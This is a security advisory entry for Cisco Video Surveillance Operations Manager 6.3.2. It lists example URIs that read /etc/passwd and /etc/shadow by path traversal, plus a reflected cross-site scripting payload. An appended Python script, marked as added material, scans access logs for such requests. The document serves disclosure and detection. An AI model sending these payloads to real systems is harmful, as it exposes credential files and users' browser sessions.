Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities
BID:58476
| Bugtraq ID: | 58476 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 13 2013 12:00AM |
| Updated: | Mar 13 2013 12:00AM |
| Credit: | b.saleh |
| Vulnerable: | Cisco Video Surveillance Operations Manager 6.3.2 |
| Not Vulnerable: | |
Exploit / POC
An attacker can exploit some of these issues with a browser. To exploit a cross-site scripting issue the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
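
For reviewing web access logs for requests shaped like the example URIs above, the following is an added example, not part of the original advisory or any Cisco tooling. The finding labels, the file name ims.log and the log lines are constructed for illustration, and the check also covers percent-encoded forms of the same requests.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
READ_LOG = "/bwt/utils/logs/read_log.jsp"
VSOM_INDEX = "/vsom/index.php"
# Listed on the page with no description of the issue: reported, not judged.
LISTED_ONLY = {"/monitor/logselect.php", "/broadware.jsp"}

def fully_unquote(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (double encoding)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return sorted finding labels (hypothetical names) for one request target."""
    findings = set()
    parts = urlsplit(target)
    path = fully_unquote(parts.path).lower()
    if path == READ_LOG:
        for raw in parse_qs(parts.query, keep_blank_values=True).get("log", []):
            value = fully_unquote(raw).replace("\\", "/")
            # A log name should be a bare file name: no absolute path, no ".." segment.
            if value.startswith("/") or ".." in value.split("/"):
                findings.add("read_log-traversal")
    if path.startswith(VSOM_INDEX) and re.search(r"[<>\"']", path[len(VSOM_INDEX):]):
        findings.add("vsom-path-markup")
    if path in LISTED_ONLY:
        findings.add("listed-path-request")
    return sorted(findings)

def scan(lines):
    """Return (line_number, labels) for log lines with at least one finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and (labels := classify(match.group(1))):
            hits.append((number, labels))
    return hits

# Constructed sample access-log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2013:10:00:01 +0000] "GET /BWT/utils/logs/read_log.jsp?filter=&log=ims.log HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Mar/2013:10:02:11 +0000] "GET /BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd HTTP/1.1" 200 1834',
    '198.51.100.7 - - [13/Mar/2013:10:02:15 +0000] "GET /BWT/utils/logs/read_log.jsp?filter=&log=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 0',
    '203.0.113.5 - - [13/Mar/2013:10:05:40 +0000] "GET /vsom/index.php/%22/title%3E%3Cscript%3Ealert(%22ciscoxss%22);%3C/script%3E HTTP/1.1" 200 9021',
    '192.0.2.10 - - [13/Mar/2013:10:06:02 +0000] "GET /vsom/index.php HTTP/1.1" 200 8800',
    '203.0.113.5 - - [13/Mar/2013:10:07:19 +0000] "GET /monitor/logselect.php HTTP/1.1" 200 412',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```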